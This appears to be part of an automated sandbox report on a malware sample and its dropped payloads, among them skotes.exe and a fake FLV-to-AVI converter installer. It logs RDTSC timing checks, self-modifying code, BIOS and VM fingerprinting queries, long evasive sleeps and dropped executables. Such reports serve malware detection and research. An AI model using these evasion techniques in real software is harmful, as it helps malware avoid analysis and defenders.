                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A91C02 second address: A91C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF30D194DB6h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A91EF1 second address: A91EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A91FBC second address: A91FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A92527 second address: A9252E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A93EE2 second address: A93EF2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007FF30D194DB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A93EF2 second address: A93EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A92D54 second address: A92D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FF30D194DCFh 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A92D7C second address: A92D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A954B8 second address: A954BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A954BC second address: A9551E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sbb esi, 095CBC00h 0x0000000d push 00000000h 0x0000000f mov esi, dword ptr [ebp+122D33E1h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FF30CF3CAE8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 je 00007FF30CF3CAF2h 0x00000037 jmp 00007FF30CF3CAECh 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FF30CF3CAF3h 0x00000044 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A9551E second address: A9555E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF30D194DBCh 0x00000008 jg 00007FF30D194DB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 je 00007FF30D194DC8h 0x00000018 jmp 00007FF30D194DC2h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF30D194DC4h 0x00000024 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A96115 second address: A9611A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A96BBA second address: A96BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A96BBF second address: A96BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30CF3CAEFh 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A96BD2 second address: A96C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov esi, dword ptr [ebp+122D3605h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF30D194DB8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov si, cx 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 jmp 00007FF30D194DC5h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF30D194DC7h 0x00000040 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A96C36 second address: A96C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A9697C second address: A96997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A97E72 second address: A97E79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSpecial instruction interceptor: First address: EFE837 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSpecial instruction interceptor: First address: EFE8E7 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSpecial instruction interceptor: First address: 109BF37 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSpecial instruction interceptor: First address: 109C271 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSpecial instruction interceptor: First address: 10C78F7 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSpecial instruction interceptor: First address: 11276F3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSpecial instruction interceptor: First address: 8DF791 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSpecial instruction interceptor: First address: 8DF835 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSpecial instruction interceptor: First address: A87D0E instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSpecial instruction interceptor: First address: 8DD32A instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSpecial instruction interceptor: First address: A9CBC0 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSpecial instruction interceptor: First address: B15822 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSpecial instruction interceptor: First address: B6EFC3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSpecial instruction interceptor: First address: D123C3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSpecial instruction interceptor: First address: D39CF2 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSpecial instruction interceptor: First address: B6EF20 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSpecial instruction interceptor: First address: D1A92D instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSpecial instruction interceptor: First address: D9CEA9 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 8EFC3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 2323C3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 259CF2 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 8EF20 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 23A92D instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 2BCEA9 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSpecial instruction interceptor: First address: 88EA61 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSpecial instruction interceptor: First address: A5E5B8 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSpecial instruction interceptor: First address: AC4D6E instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSpecial instruction interceptor: First address: 2898DE instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSpecial instruction interceptor: First address: 2899BC instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSpecial instruction interceptor: First address: 438BD9 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSpecial instruction interceptor: First address: 449652 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSpecial instruction interceptor: First address: 4C273A instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_053E0123 rdtsc 6_2_053E0123
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 407Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 415Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 366Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 419Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 402Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 382Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7010
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\icuuc51.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062133001\6299d9e5a5.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\libGLESv2.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\uninstall\is-2E87P.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\msvcr100.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-TBCD3.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-M72JG.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_isdecmp.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_isdecmp.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\Qt5PrintSupport.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062131001\d37c6a3c82.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\msvcp100.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_setup64.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\icuin51.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[4].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_setup64.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062126001\a6c5834e2f.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-B6V2L.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-F3L00.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_shfoldr.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-SOSP7.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062127001\62950fb3a8.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-2RO6E.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-CAFKN.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\Qt5Concurrent.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\libEGL.dll (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_setup64.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062130001\072d564b60.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_iscrypt.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[3].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_shfoldr.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\is-0DEO7.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062125001\4ee3234999.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-PJU74.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-LC5T3.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_shfoldr.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-S5638.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\uninstall\unins000.exe (copy)Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exeJump to dropped file
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exe TID: 7660Thread sleep time: -240000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1440Thread sleep count: 407 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1440Thread sleep time: -814407s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3568Thread sleep count: 415 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3568Thread sleep time: -830415s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 604Thread sleep count: 223 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 604Thread sleep time: -6690000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 736Thread sleep count: 366 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 736Thread sleep time: -732366s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1656Thread sleep count: 343 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1656Thread sleep time: -686343s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3412Thread sleep count: 322 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3412Thread sleep time: -644322s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3208Thread sleep count: 419 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3208Thread sleep time: -838419s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5508Thread sleep count: 402 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5508Thread sleep time: -804402s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1280Thread sleep count: 382 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1280Thread sleep time: -764382s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 604Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe TID: 2960Thread sleep time: -60000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe TID: 6068Thread sleep time: -300000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe TID: 6828Thread sleep time: -210000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe TID: 7928Thread sleep time: -150000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 7010 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep count: 115 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com TID: 7540Thread sleep count: 34 > 30
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeFile opened: PhysicalDrive0
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeThread delayed: delay time: 60000
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
